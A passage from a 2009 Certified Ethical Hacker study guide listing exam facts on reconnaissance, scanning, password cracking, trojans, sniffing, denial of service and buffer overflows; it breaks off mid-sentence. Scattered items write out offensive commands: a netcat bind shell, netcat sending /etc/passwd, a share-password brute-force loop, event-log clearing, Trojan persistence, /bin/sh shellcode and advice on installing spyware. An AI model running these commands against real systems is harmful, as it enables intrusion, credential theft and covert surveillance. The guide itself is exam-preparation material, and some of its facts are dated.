Embed Size (px)
Citation preview
2009
Parameter Security
12/1/2009
C|EH Study Guide
C|EH Study Guide
Hacker University Page 2
Table of Contents CEH v6 Study Guide ....................................................................................................................................... 4
Introduction to Ethical Hacking ................................................................................................................ 4
Footprinting .............................................................................................................................................. 5
Scanning .................................................................................................................................................... 7
Enumeration ........................................................................................................................................... 12
System Hacking ....................................................................................................................................... 12
Trojans and Backdoors ............................................................................................................................ 16
Sniffers .................................................................................................................................................... 16
Denial of Service ..................................................................................................................................... 17
Session Hijacking ..................................................................................................................................... 18
Buffer Overflows ..................................................................................................................................... 19
Hacking Web Servers .............................................................................................................................. 20
Web Application Vulnerabilities ............................................................................................................. 21
Web Based Password Cracking ............................................................................................................... 22
Linux Hacking .......................................................................................................................................... 22
Cryptography .......................................................................................................................................... 23
SQL Injection ........................................................................................................................................... 24
Hacking Wireless Networks .................................................................................................................... 25
Viruses ..................................................................................................................................................... 25
Evading IDS, Firewalls, and Honeypots ................................................................................................... 26
Social Engineering ................................................................................................................................... 28
Physical Security ...................................................................................................................................... 28
Attack Analysis ............................................................................................................................................ 29
Attack #1 ................................................................................................................................................. 29
Attack #2 ................................................................................................................................................. 29
Attack #3 ................................................................................................................................................. 30
Attack #4 ................................................................................................................................................. 31
Attack #5 ................................................................................................................................................. 31
Attack #6 ................................................................................................................................................. 31
Attack #7 ................................................................................................................................................. 32
Attack #8 ................................................................................................................................................. 33
C|EH Study Guide
Hacker University Page 3
Attack #9 ................................................................................................................................................. 34
Attack #10 ............................................................................................................................................... 36
Attack #11 ............................................................................................................................................... 37
Attack #12 ............................................................................................................................................... 38
Attack #13 ............................................................................................................................................... 38
Attack #14 ............................................................................................................................................... 39
Attack #15 ............................................................................................................................................... 39
Labs ............................................................................................................................................................. 40
Footprinting ............................................................................................................................................ 40
Scanning .................................................................................................................................................. 41
Enumeration ........................................................................................................................................... 42
System Hacking ....................................................................................................................................... 42
Trojans and Backdoors ............................................................................................................................ 43
Sniffers .................................................................................................................................................... 44
Denial Of Service ..................................................................................................................................... 45
Session Hijacking ..................................................................................................................................... 46
Buffer Overflow ....................................................................................................................................... 52
Hacking Web Servers .............................................................................................................................. 55
Web Application Vulnerabilities ............................................................................................................. 55
Linux Hacking .......................................................................................................................................... 56
SQL Injection ........................................................................................................................................... 57
Wireless Hacking ..................................................................................................................................... 60
Viruses ..................................................................................................................................................... 60
C|EH Study Guide
Hacker University Page 4
CEH v6 Study Guide
Introduction to Ethical Hacking
1. The five steps of malicious hacking are:
Reconnaissance
Scanning
Gaining Access
Maintaining Access
Covering Tracks
2. Active attacks are typically more intrusive and therefore more easily detected.
3. Passive attacks include information gathering through web search engines, DNS queries etc. Note: scanning the range of IP addresses found in a company’s DNS database is NOT passive footprinting.
4. A black hat hacker is malicious and is sometimes call a cracker.
5. A white hat hacker is an ethical hacker. An ethical hacker does it for defensive purposes
and has permission. A whitehat hacker is an ethical hacker that runs tests, writes
reports, and signs all legal non-disclosure documents prior to working on a test.
6. Hacktivism is hacking for social, political, and religious causes.
7. Black box testing is when you have no knowledge of a target. You are only given a
company name.
8. White box testing is when you have full knowledge.
9. Gray box testing, also called internal testing, is when you perform attacks with a normal
user account to see if you can escalate privileges.
10. Insiders are common sources of attacks. Examples of insiders include disgruntled
employees, customers, suppliers, vendors, business partners, contractors, temps, and
consultants.
11. A company is legally liable for the content of e-mail that is sent from its systems,
regardless of whether the message was sent for private or business-related purposes.
You cannot claim ignorance of the law to avoid prosecution.
12. Every company should have an Information Security Policy (ISP) that informs
employees about what they are allowed to use the company’s systems for, what is
prohibited, and what should happen if they break the rules.
13. The United States CANSPAM Act criminalizes the transmission of unsolicited
commercial e-mail (SPAM) without an existing business relationship
14. The Computer Misuse Act 1990 is a United Kingdom (UK) law that makes hacking into
an unauthorized network a felony.
15. The first step an attacker will take is to perform a reconnaissance of the remote target.
C|EH Study Guide
Hacker University Page 5
16. Educate everyone with books, articles, and training on risk analysis, vulnerabilities, and
safeguards to bridge the gap between black hats and white hats.
17. Suicide hackers are those hackers that do not care about being caught.
18. The FBI investigates computer crimes involving e-mail scams and mail fraud using 18
U.S.C. 1030 Fraud and Related Activity in Connection with Computers.
19. An exploit takes advantage of vulnerabilities in a system in the pursuit of some
objective.
Footprinting
20. Footprinting is the blueprinting of a security profile of an organization
21. Examples of footprinting tools include:
SamSpade
NSLookup
Traceroute
NeoTrace
22. NSLookup is a program to query Internet domain name servers. It is used to display DNS
information.
23. Type the following to do a zone transfer with NSLookup:
Nslookup (takes you into interactive mode)
ls –d targetsite.com
24. Zone transfers allow you to list all DNS information for a domain
25. Below is an example of a log entry that shows a possible zone transfer:
Mar 12 01:44:12 [3142]: IDS181/nops-x86: 12.55.180.48 ->
10.8.0.7:53
26. There are several types of DNS records:
A – host record
CNAME – alias
MX – mail exchange (mail server)
NS – name server
SOA – start of authority
27. A DNS zone is a collection of domains. You can use tools such as NSLookup, Dig, Sam
Spade, or Host to perform a zone transfer.
28. The highest priority MX record has the lowest number
29. A DNS SOA record will contain the following:
Serial number – revision number (sometimes called ‘version’ number)
Refresh – refresh interval for secondary DNS servers
Retry – retry interval if zone transfer fails
C|EH Study Guide
Hacker University Page 6
Expire – how long until the secondary server will hold onto the record if it does not
receive an update (e.g., 604800 = one week)
TTL – default TTL for client name resolution
30. A secondary name server will request a zone transfer from a primary name server when
a primary SOA is higher than a secondary SOA.
31. Traceroute works by manipulating the TTL field to elicit a time exceeded in transmit
message. It is commonly used to find the route to a target system. While it commonly
uses UDP and ICMP, traceroute can use any protocol. Therefore, blocking ICMP and
UDP is not enough to protect hackers from tracerouting into your network. There is no
way to completely block tracerouting.
32. Dumpster diving is when you search through garbage, recycled paper, and other rubbish
to collect information about a company.
33. The Netcraft web site is a passive tool that you can use to see the operating system a
web server is using.
34. Archive.org allows you to retrieve an archive of a company’s web site.
35. There are five Regional Internet Registrars (RIRs):
ARIN (North America) – used for .com addresses
APNIC (Asia Pacific)
LACNIC (South and Central America) - use for places like Panama
RIPE (Europe, Northern Africa)
AfNIC (Sub-Saharan Africa) –note: the test may not be updated to include AfNIC
36. Examples of passive footprinting include searching web sites, performing queries on
search engines, and going through rubbish to find information.
37. Using Whois and Netcraft are considered passive scanning.
38. Hackers can use job postings to determine the operating systems and applications being
used at a company.
39. Passive information gathering includes discovering which web domains a company is
using.
40. You can use Google to determine if a company’s web site is linked by other sites. This is
useful in footprinting. For example, to find all sites that have links to
www.eccouncil.org, type link:www.eccouncil.org into Google.
41. You can search Google for different types of systems on the Internet. For example, to
search for all BorderManager Proxy/Firewalls, type intitle:”BorderManager
information alert”.
42. Technical information is often revealed in newsgroup postings. You can use NNTP
websites to search for newsgroup postings by a target company.
43. You should not have an AD integrated DNS server for Internet domains.
C|EH Study Guide
Hacker University Page 7
Scanning
44. To discover what telephone numbers you can use to dial into a router, use a war-dialing
tool with a range of phone numbers and look for a CONNECT response.
45. Once footprinting is completed, the next step is scanning.
46. Common war dialing tools include:
THC-Scan
ToneLoc
TBA
47. Firewalking is a technique used to discover what rules are configured on a gateway.
Sends packets to various ports (usually 1-1024) with the exact TTL of the target.
You can use Hping2 to do firewalking.
48. An IDLE scan monitors the IP ID value of an idle host. If this value increments by more than one, then the port are open on a target system.
49. Windows machines do not respond to broadcast pings or pings directed at a network address.
50. A clue that someone is doing an SNMP walk on your system is seeing a series of items
separated by periods in your log files.
Example: system.SysName, system.sysObjectID
51. SNMP is a connectionless protocol that uses UDP port 161. The default passwords used
by SNMP are private and public.
52. Cisco routers can protect against SNMP attacks by using access lists. For example, the
following commands will only allow hosts on the 192.168.99.0/24 network to read and
write information via SNMP. This configuration does not prevent someone from
running a network sniffer and capturing returned traffic with the configuration file. It
also does not prevent someone from sending a customized SNMP set request with a
spoofed source IP address.
access-list 1 permit 192.168.99.0 0.0.0.255
!
snmp-server community public RO
snmp-server community private RW 1
53. An SNMP scanner will send SNMP requests to multiple IP addresses, trying different
community strings, and waiting for a reply. If you get no reply, it could be that the
SNMP server is not running, you have tried an invalid community string, or the machine
is unreachable.
54. SNMP uses community strings that are transmitted in clear text and therefore are
susceptible to sniffing.
55. TCP/IP Concepts
The three-way handshake is SYN, SYN-ACK, ACK.
C|EH Study Guide
Hacker University Page 8
You cannot spoof your IP address and successfully use TCP.
The FIN flag is used to close a TCP connection when a host has no more data to
transmit. However, a host can continue to receive data as long as the SYN sequence
number of transmitted packets is lower than the packet segment containing the set
FIN flag.
The receiving host sets the window size which specifies the number of packets it will
receive before sending an acknowledgement.
0xFFFFFFFFFFFF is the destination MAC address of a broadcast frame.
In TCP communication, a host will set its acknowledgement number to the sequence
number it just received plus one. For example, if a host just received sequence
number 100, it will respond with acknowledgement number 101.
There are 1024 well known ports (for this exam).
56. OS Fingerprinting is the process of determining the operating system of your target.
Fingerprinting an operating system does not depend on patches that have been applied.
With NMAP you can do OS fingerprinting with the -O command line switch. Queso is
another tool that can be used for OS fingerprinting.
57. The default behavior of an NMAP scan is to do both an ICMP ping sweep (ICMP
ECHO_REQUEST) and a TCP ACK ping sweep.
58. ICMP type/codes:
Type 0 code 0 = Echo Reply (used with the ping command)
Type 3 code 13 = Destination unreachable: administratively prohibited (this message is given by routers when a router is blocking ICMP)
Type 8 code 0 = Echo (used with the ping command)
Tyle 11 code 0 = Time exceeded
Type 13 code 0 = Timestamp request
Type 14 code 0 = Timestamp reply
Type 17 code 0 = Address mask request
Type 18 code 0 = Address mask reply 59. There are several methods of scanning with NMAP:
Scan Type NMAP Command
Bits set Response from host when port is open
Response from host when port is closed
TCP Connect()
Nmap –sT SYN SYN/ACK RST
SYN A.K.A stealth scan
Nmap –sS SYN
SYN/ACK (SYN scans do not respond to SYN/ACKs)
RST
C|EH Study Guide
Hacker University Page 9
FIN Nmap –sF FIN -- RST
XMAS Nmap –sX FIN/URG/PSH
-- RST
Null Nmap –sN None -- RST
60. A fragmentation scan sends the probe packet and splits the TCP header over several
packets to make it harder for packet filters to detect what is happening.
61. A TCP Connect scan is the most accurate and reliable.
62. The three inverse scans are FIN (FIN bit), XMAS (FIN/URG/PSH) and NULL (no bits). The inverse scans will report nothing for an open port and a RST for a closed port. Windows does not comply with the RFC and therefore will report all ports as closed when performing these scans.
63. SAINT is a vulnerability scanner that only works on Linux and UNIX.
64. Connect scans should be used when you need reliable and quick results but do not care
about being stealth.
65. A distributed port scan operates by having multiple computers each scan a small
number of ports, then correlating the results.
66. Many of the Nmap commands in Linux must be run under the context of the root
administrator. For example, to run a ping scan against the 192.168.1.15 host, type
„sudo nmap –sP 192.168.1.0/24‟.
67. A ping scan will produce results similar to the following:
Host 192.168.1.1 appears to be up.
MAC Address: 00:13:55:3F:1C:44 (Cisco-Linksys)
Host 192.168.1.2 appears to be up
MAC Address: 00:55:23:8D:00:1E (Compaq Computer)
68. Nmap will try to guess the operating system when it does a scan against a computer.
Sometimes it is unable to detect the operating system. However, by looking at the open
ports you can often determine what type of machine it is. For example, while there is
no way for telling for sure, the following output is most likely a Windows Domain
Controller because LDAP is open.
21/tcp open ftp
25/tcp open smtp
80/tcp open http
389/tcp open ldap
443/tcp open https
C|EH Study Guide
Hacker University Page 10
69. Stealth scans do not open a full TCP connection.
70. If you see someone trying to scan port 500 (ISAKMP), they might be trying to determine
the type of VPN implementation you are using and checking for IPSec.
71. Nmap can be used to scan multiple networks. For example, the command nmap
215.55.12-13.* will scan 512 hosts.
72. If you are not getting a ping response using ICMP, it might be because ICMP is being
blocked. Try HPING2 instead because it uses stealth TCP packets to connect instead of
ICMP.
73. LDAP (TCP 389) and MS-SQL-S (TCP 1433) are ports that are often open on Windows
2000 servers.
74. Pings sweeps may not return results if:
The host is down
ICMP is being filtered
The packet TTL value is too low
The destination network is down
75. You can scan for protocols in use on a target by using the nmap –sO command. This
will show up in a TCP dump with the words ip-proto-<protocol number>.
76. If pings and basic port scans fail, try using an inverse scan like XMAS.
77. LDAP uses port 389.
78. The –O switch in Nmap is used for OS detection.
79. If you see suspicious traffic on port 53, check to see if an attacker is trying to do a DNS
zone transfer.
80. Netstat has a number of switches. The netstat –anb –p tcp command will
return all listening ports as well as the files that use those ports.
C:\netstat –anb –p tcp
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 Listening 125
C:\windows\system32\ws2_32.dll
C:\windows\system32\RPCRT4.dll
C:\windows\system32\rpcss.dll
C:\windows\system32\svchost.exe
C|EH Study Guide
Hacker University Page 11
C:\windows\system32\ADVAPI32.dll
[svchost.exe]
81. Hping2 has many options. The following command will generate a single TCP SYN
packet with a source port of 2000, destination port 30, with a sequence number 15
spofing the IP address 172.16.0.5:
Linux#hping2 –I ether0 –a 172.16.0.5 –s 2000 –p 30 –syn –
c l –d 0xF00 –setseq 0x0000000f 10.0.0.1
82. Hping2 is a pinging tool and a packet assembler. Here’s another example of Hping2: #hping2 10.0.0.1 –seqnum –p 139 –S –I u1 –I eth0
HPING uaz (eth0 10.0.0.1) S set, 40 headers + 0 data bytes
2361294848 +2361294848
2411626596 +50331648
The first number is the sequence number and the second is the offset. 83. Floppyscan is a utility loaded on a floppy disk that will cause a Blue Screen of Death to
appear on your monitor while it performs a port scan in the background.
84. The best defense against Hping2 attacks is to use stateful packet inspection on your
firewalls.
85. You can specify ports to scan with nmap using the –p switch. For example, to scan the lower 1024 UDP ports, execute the following command: nmap –sU –p 1-1024 <ip address>.
86. You can use Netcat to scan ports: nc –u 1-1024.
87. You can scan for IP protocols using the command nmap -s0. Look for the text “ip-proto” in tcpdump output to tell if someone is doing an IP protocol scan.
88. ACK scans are used to scan and enumerate the rule sets on firewalls. If a port is being filtered by a rule set you will get nothing back. If the port is not being filtered then you should get a RST.
Responses to an ACK scan: UNFILTERED: RST FILTERED: (nothing)
89. Security scanners are only as smart as their database and cannot find unpublished
vulnerabilities.
90. You cannot block a hacker from doing a FIN, NULL, or XMAS scan on your network.
91. The signature of attack for SYN Floods contains a large numbers of SYN packets
appearing on a network without the corresponding reply packets.
92. SandTrap can be used to notify you if anyone tries to break into your PBX.
93. You cannot stop a hacker from launching FIN, NULL, or X-MAS scans on your network.
94. If you are concerned that someone could block your scans and you want to slow your
scans down, try using the -T0 or -T1 switch to change the timing.
C|EH Study Guide
Hacker University Page 12
95. In a UDP port scan, an open port will not respond and a closed port (e.g., a port not
being used) will send an ICMP message stating that the port is unreachable.
96. A program that defends against a port scanner will attempt to update a firewall rule in
real time to prevent the port scan from being completed.
97. Fragmentation scanning splits the TCP header over several packets to make it harder for
packet filters to detect what is happening.
98. Port scanning is an information gathering attack.
99. Nessus is an automated vulnerability assessment tool that has a database containing
signatures that is able to detect hundreds of vulnerabilities.
One disadvantage of an automated vulnerability assessment tool is that it is noisy.
100. After doing a port scan you should connect to open ports to discover
applications.
101. Static network address translation maps a single machine on an internal network
to a single public IP address.
102. Look in %windir%\\system32\\drivers\\etc\services to find the port number for
POP3 on your server. (Note: POP3 is used to receive e-mail).
Enumeration
103. If NMAP was unable to identify the operating system of a web server, telnet to
an open port and grab the banner.
104. Enumeration tools include USER2SID, SID2USER, and DumpSec.
105. The SID ending in 500 is the built-in Administrator account. 106. If the Administrator account has been renamed but you still know the SID, you
can use sid2user to find the new name of the Administrator account. 107. The default passwords (community-strings) in snmp are private (readwrite) and
public (read-only). These community strings are sent in clear-text and is therefore susceptible to sniffer.
108. You should use SMB signing to protect against hackers modifying SMB packets
and forwarding them.
109. If you must run an SMTP server, you cannot prevent people from using telnet to
connect to port 25 on your e-mail server.
110. Hackers will often send a single SMTP message to an address that does not exist
to gather information about internal hosts used in e-mail treatment.
111. To grab a banner of a web server, telnet to port 80 and type HEAD / HTTP/1.0.
112. An attacker may scan port 137 to check for file and print sharing on Windows
systems.
System Hacking
113. If L0phtcrack is unable to capture any logons when attempting to sniff SMB
exchanges, it could be that the network is using Kerberos.
C|EH Study Guide
Hacker University Page 13
114. Alternate Data Streams (ADS) is found in all versions of NTFS and is described as
the ability to fork file data into existing files without affecting their functionality, size, or
display to traditional file browsing utilities like dir or Windows Explorer.
115. A hardware keylogger cannot be detected by anti-virus or anti-spyware products.
116. Hardware keyloggers, software keyloggers, and sniffers can all be used to
capture passwords.
117. Snow is an example of a steganography utility that exploits the nature of white
space and allows the user to conceal information in these white spaces.
118. Stealth Anonymizer can be used to bypass Internet monitoring systems.
119. The three password cracking techniques are dictionary, hybrid, and brute force.
A dictionary attack compares the hashes with those in a dictionary file. A hybrid attack
is a combination of both brute force and dictionary. A brute force attack is trying every
combination of letters, numbers, upper case, lower case, and special characters. A
dictionary attack is the fastest while a brute force attack takes the longest. Brute force
is also your best option if random password generators are being used to create
passwords for users.
120. You can always tell if a password has less than 8 characters because the hash will
end with AAD3B435B51404EE.
121. You can use netcat to grab a password file. The syntax would be nc –l –u –p
1111 < /etc/passwd.
122. Hackers will often try to cover their tracks. If a hacker wanted to clear any
records of brute force attempts, they would want to delete
c:\windows\system32\config\SecEvent.Evt.
123. CACLS.exe is a command line tool that can be used to assign, display, or modify
ACLs to files or folders.
124. You can use Pwdump to dump the SAM password hashes to a file. The syntax is
pwdump > file.txt.
125. The last step an attacker will do in an attack to prevent being caught is to cover
their tracks.
126. Windows 2000 server Syskey uses 128 bit encryption. This is considered an
effective countermeasure to the weaknesses in Windows LM hashes (along with
enforcing Windows complex passwords).
127. Best practices for password creation:
Never use a password found in a dictionary
Never use a password related to your hobbies, pets, relatives, or date of birth
Never leave a default password
Never use a password related to the hostname, domain name, or anything else that
can be found with whois
C|EH Study Guide
Hacker University Page 14
128. Windows LAN Manager (LM) hashes are converted to uppercase and split to give
an effective length of 7 characters.
129. You should do the following when you introduce a new Windows computer onto
your network:
Patch the system by installing the latest service packs and hotfixes
Configure Windows Update to be automatic
Install a personal firewall and lock down unused ports from connecting to your
computer
Create a non-admin user with a complex password and logon to this account
Install the latest anti-virus signatures
Key applications should have the latest security patches installed
130. Alternate data streams are used to hide files inside of other files.
Clue to spot ADS: file1.exe:file2.exe (two files separated by a colon) 131. You can crack passwords via the command line with the following command:
for /f "tokens=1" %%a in (file.txt) do net use *
\\10.0.0.1\c$ /user:"Administrator" %%a 132. Password cracking tools do not reverse the hash of a password to recover
passwords. Instead, they hash words and compare it with the password's hash. 133. The best countermeasure against privilege escalation is to give each user the
least amount of privileges.
134. MBSA is a patch management utility that scans one or more computers on your
network and alerts you if any important Microsoft security patches are missing.
135. 14 character passwords do not take much longer to crack than 8 character
passwords because LanManager hashes are broken up into two seven character fields.
136. Attacking well-known system defaults is on of the most common hacker attacks.
Often the default location of installation files can be exploited which allows a hacker to
retrieve a file from the system, many software packages come with “samples” that can
be exploited, and many systems come with default user accounts with well-known
passwords that administrators forget to change.
137. Image steganography hides information within picture files.
138. If you have remote users connecting in to a Windows Server 2003 Active
Directory domain by using Challenge Handshake Authentication Protocol (CHAP), then
you should enable the “Store password using reversible encryption for all users in the
domain” setting in the Default Domain Group Policy.
139. One indication that you may be infected with a stealth kernel level rootkit is that
you start to realize that your computer is not running as fast as it used to and your
computer reports you have limited space on your hard drive
140. Steganography fits in the Hide Files step of the system hacking cycle.
C|EH Study Guide
Hacker University Page 15
141. To protect your VoIP network that uses the operating system VxWorks on the
phones, block UDP port 17185 at the firewall to prevent the OS default debugger
program from communicating outside the network (note: the exam may incorrectly
have this as TCP port 17185; just remember it is port 17185).
142. Kerberos uses port 88 (TCP/UDP)
143. Security tokens are a good choice for two-factor authentication. They are a
hardware device that you can use along with a security or identifying pin number and
are often less expensive than smart cards.
144. You can install screen capturing Spyware on someone’s computer to track
someone’s activities online and send you an e-mail once a day to see what that person
has been up to when they surf the web.
145. PDF passwords can be easily cracked.
146. If you notice your log file decreasing in size, you should log this as suspicious
activity, continue to investigate, and take further steps according to your security policy.
147. You can use the Elsave utility to clear event logs. Winzapper will selectively
erase event logs.
148. OutGuess is a steganography tool for JPG images; wbStego works with bitmaps.
149. GINA is the Graphical Identification and Authentication DLL that can be used to
replace the login screen.
150. Challenge/response authentication is used to prevent replay attacks.
151. Mandatory access control uses sensitivity labels on information and compares
them to the level of security a user is operating at.
152. Disable LM authentication in the registry on Windows XP.
153. John the Ripper can be used to crack a variety of passwords but the output does
not show if the password is upper or lower case.
154. You should not respond to invalid usernames and passwords with Invalid
Username and Invalid Password (this reveals too much information).
155. You can extract a Trojan from a standalone file with this syntax:
C:\cat textfile.txt:Trojan.exe > Trojan.exe
156. The following command, when executed between two hosts, can generate huge
amount of useless network data that you can use for performance testing:
Machine 1
#yes XXXXXXXXXXXXXXXXXXXXXXXXXXXX | nc -v -v -l -p
55555 > /dev/null
Machine 2
#yes ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ | nc machine1
55555 > /dev/null
C|EH Study Guide
Hacker University Page 16
Trojans and Backdoors
157. Use cryptcat instead of netcat if you want to encrypt your traffic.
158. A Trojan is a program masked inside another program (such as a game). You can
often see the Trojan running in the background by looking in the Windows Task
Manager. The process of hiding a Trojan or keylogger in another file is called wrapping.
159. You should compare a file's MD5 signature with the one published on the distribution media to make sure that the file is not infected with a Trojan.
160. To see what application executables are listening on ports, run the fport utility. 161. Example of snort log showing a Back Orifice attack:
04/20-13:04:45.01351 172.16.0.5:31337 ->
192.168.1.1:1025
162. To start a Netcat listener: nc –l –p <port number> -e cmd.exe –d
163. To connect to a Netcat listener: nc <ip address> <port number> 164. Qaz is a Trojan that renames notepad to note.com. 165. DNS uses port 53 and is often used by backdoor programs because it is most
likely open.
166. Hackers will often make their Trojans persistent by adding a registry entry to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
167. Tripwire is an example of a file integrity verification tool that can be used to
detect unauthorized changes or modification of binary files on a system.
168. You can use the Netstat command to see how many connections your computer
is currently running.
169. Use the fport utility to look for applications that listen on certain ports.
170. Port 6667 is used by the Net-Devil Trojan. In hex, this is 0x1A0B.
Sniffers
171. You can get around switches by using ARP spoofing, MAC duplicating, and MAC flooding.
ARP spoofing the default gateway is a common method to capture traffic when using
a switched network.
Without other techniques like MAC flooding or ARP spoofing, you will not be able to
capture traffic on a switched network.
Use ./macof to flood the port to MAC address table (CAM table). This will move the
switch into broadcast mode and allow you to sniff all packets on the network.
172. Ettercap and Ethereal (now Wireshark) are popular sniffers. Sniffers work best on networks using hubs.
To detach Ettercap from the console and log all sniffed passwords to a file, use the command: ettercap –NCLzs –quiet
Ethereal allows for filters. For example, to create a display filter that only looks for the three-way handshake for a connection from host 172.16.0.4, the filter would be: ip.addr==172.16.0.4 and tcp.flags.syn
C|EH Study Guide
Hacker University Page 17
173. WinPCap is the name of the Windows Packet Capture library which must be installed in order to use a sniffer on Windows platforms. Many sniffers install this automatically for you. LibPCap is the equivalent for Linux.
174. The best options for preventing attackers from sniffing your passwords is to use
Kerberos, Smart cards, and/or Stanford Secure Remote Password (SRP)
175. You can defend against ARP spoofing by:
placing static ARP entries on servers, workstations, and routers
Using the ARPWALL system
Tuning IDS sensors to look for large amounts of ARP traffic on local subnets
176. Wireshark (ethereal) allows for filters. For example, to filter only packets with
hotmail e-mail messages, use the filter (http = “login.passport.com”) && (http contains
“POP3”).
177. TCPflow can be used to extract the application layer data from each TCP
connection from a log file into separate files.
Denial of Service
178. A smurf attack is when you send a broadcast ping with a spoofed source
address of your target. A fraggle is similar to a smurf attack but uses UDP.
179. A SYN flood is a DOS attack in which a large number of SYN packets appear on a
network without the corresponding reply packets.
180. A LAND attack is when an attacker forges a TCP/IP packet, causing the victim to
try and open a connection with itself. This causes the system to go into an infinite loop
which, in turn, can slow down the system.
181. The following are techniques used to block against SYN flood attacks:
Micro blocks: instead of allocating a complete connection object, simply allocate a
micro-record.
SYN cookies: instead of allocating a record, send a SYN-ACK with a carefully
constructed sequence number generated as hash of the client’s IP address, port
number, and other information. When the client responds with a normal ACK, the
sequence number will be included which the server then verifies.
RST cookies: An alternative to SYN cookies where the server sends a wrong SYN/ACK
back to the client. The client should generate a RST packet telling the server that
something is wrong, which informs the server that the client is valid.
Stack tweaking: TCP attacks can be tweaked to reduce effects of SYN floods. For
example, timeouts can be changed.
182. A Ping of Death attack sends fragmented ICMP packets that, when
reconstructed, is larger than 65,536 bytes.
183. IDS devices are primary victims to smurf attacks.
C|EH Study Guide
Hacker University Page 18
184. A denial of service attack prevents legitimate users from gaining access to a
service. A distributed denial of service (DDoS) uses zombie hosts to launch an attack.
185. A Teardrop attack modifies offset values.
186. Ping sweeping your network may cause your IDS to report a smurf attack. To
prevent these alarms, do not scan the broadcast IP address when scanning your
network.
187. Hackers usually control Bots through IRC channels. The initial two commands
that an IRC client sends to join an IRC network are USER and NICK. (note: technically,
the PASS command comes first according to RFC 1459, but it is optional. Therefore,
USER/NICK are the initial first two commands)
188. Network Based Application Recognition (NBAR) is a Cisco IOS mechanism that
examines packets on Layers 4 to 7. It can be used to counter DDoS attacks and worm-
generated traffic by identifying malicious packets and dropping them.
189. Emsa Web monitor can be used to check on the status (uptime statistics) of your
web server.
190. Make sure your router won’t take a directed broadcast to prevent smurf attacks.
191. Reflective DDoS attacks usually spoof the originating IP addresses and send the
requests at reflectors. To detect reflectors on your network you should scan the
network using Nmap for the services used by these reflectors
192. Trinoo, TFN2k, WinTrinoo, T-Sight, and Stracheldraht are all DDOS tools
193. The following command may freeze a router:
ping -l 56550 10.0.0.1 -t
Session Hijacking
194. To perform a session hijack, you must find the sessions, predict the sequence number, and take over the session.
195. Strong authentication is not enough to call your network secure because someone could always perform session hijacking to take over sessions that are already authenticated. This is the key advantage to session hijacking: taking over an already authenticated connection.
196. Hunt is a common session hijacking tool. It can intercept traffic then perform a man-in-the-middle attack (MiTM).
197. In a Man-in-the-middle (MiTM) attack, an attacker will intercept a transmission
to copy and forward all packets between two hosts.
198. Using unpredictable sequence numbers will help secure against session
hijacking.
199. TCP/IP session hijacking is carried out on the transport layer.
200. Challenge/response authentication is used to prevent session hijacking attacks.
201. Use unpredictable sequence numbers to secure sessions against hijacking.
C|EH Study Guide
Hacker University Page 19
202. RFC 2827 helps defeat IP address spoofing.
Buffer Overflows
203. Canary words are a method used by compilers to send an alarm if a buffer overflow has been attempted.
Canary adds NULL (0x00), CR (0x0d), LF (0x0a), and EOF (0xff). If they get altered when a function returns, an alarm is sent.
204. NOP sleds send a series of NO Operation instructions in an attempt to guess the return pointer.
The hexadecimal value for NOPs is 0x90. 205. The following code is usually an indication of a buffer overflow attack:
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\
x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8
d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\
x62\x69\x6e\x2f\x73\x68";
206. Buffer overflows can be exploited using such function calls as fgets(), scanf(), strcpy() and strncpy().
207. Buffer overflows are due to programming errors and bad quality assurance practices.
208. Polymorphic shell code works by XORing values over the shellcode, using loader
code to decrypt the shellcode, and then executing the decrypted shellcode.
209. Two types of buffer overflows are heap based and stack based.
210. When writing shell code, be sure to remove any null bytes as that will end the
string.
211. Buffer overflows will overwrite the ESP register with a return address of the
exploit code.
212. The following pseudo code demonstrates the logic of stopping a stack from
holding more than 200 characters in a buffer:
IF (I > 200) then exit (1)
213. Many IDS devices will have signatures for common buffer overflow attacks.
Attackers can get around this by using polymorphic shell code with a tool such as
ADMutate to change the signature of their exploits.
214. Using printf(str) instead of printf(“%s”,str) may leave your program exposed to
format string attacks.
215. Buffer overflows often try to exploit an application and launch a command shell.
Below is an example of output from a network IDS of an attack that is trying to get a
Linux command shell (/bin/sh):
C|EH Study Guide
Hacker University Page 20
Hacking Web Servers
216. Setting your web pages to be read-only may prevent others from being able to deface them.
217. IIS runs in the context of the LocalSystem account. If a hacker successfully
performs a buffer overflow attack against a default IIS installation on a Windows 2000
server, the hacker may be able to spawn a shell. The default privileges within the shell
will be LocalSystem.
218. Hex encoded characters are commonly used to obstruct URLs. 219. Cookies can be session or permanent cookies. 220. IPP, Code Red, and ISAPI Indexing Services are all used in IIS buffer overflow
exploits. 221. Some web sites use cookies to keep a user session active once a user has logged
in. When a user logs in the application, a cookie can be sent to the client that may
contain the user ID which is checked for access rights. A hacker can compromise a
system that uses cookies by intercepting the communication between the client and the
server and change the cookie to make the server believe that there is a user with higher
privileges.
222. If you can access someone’s cookie, you can use parameter manipulation to
alter the cookie to gain additional access. For example, if the cookie says ADMIN=no,
you can change the parameter to say ADMIN=yes.
223. A DNS poisoning attack is when a hacker changes a DNS entry for a web site to
point to their web server instead of the legitimate site.
224. Many systems come with default user accounts with well-known passwords that
administrators forget to change.
C|EH Study Guide
Hacker University Page 21
225. Often the default location of installation files can be exploited which allows a
hacker to retrieve a file from the system.
226. Many software packages come with “samples” that can be exploited.
227. Attackers may be able to store a copy of your web page locally, change a
‘hidden’ price value in the source code, and submit an order in order to purchase
products at a lower price.
228. Canonicalization is the process of converting something from one
representation to the simplest form. It deals with the way in which systems convert
data from one form to another.
229. You can use the robots.txt file in the root of your website to define directories
that you do not want crawled by WWW spiders.
230. One approach to secure against phishing scams is to use RSA SecureID based
authentication systems along with one-time password lists.
231. Form scalpel can be used to dissect HTML forms.
Web Application Vulnerabilities
232. Use wget to download multiple web pages.
233. Web applications often have non-validated parameters, broken access control,
broken session management, cross-site scripting, and buffer overflow vulnerabilities
234. Web applications can have several vulnerabilities, including visible clear text
passwords, anonymous user account set at default, missing latest security patches, no
firewall filters, and no SSL configured.
235. Cross-site scripting (XSS) attacks allows commands to be executed on your
machine under you local privileges without installing any software. Web forums are
often vulnerable to these kinds of attacks.
A clue that cross-site scripting is being done is the <script> tag.
An example of a cross site scripting attack is when you click on a link in an e-mail
message and are taken to a web based bulletin board where certain functions are
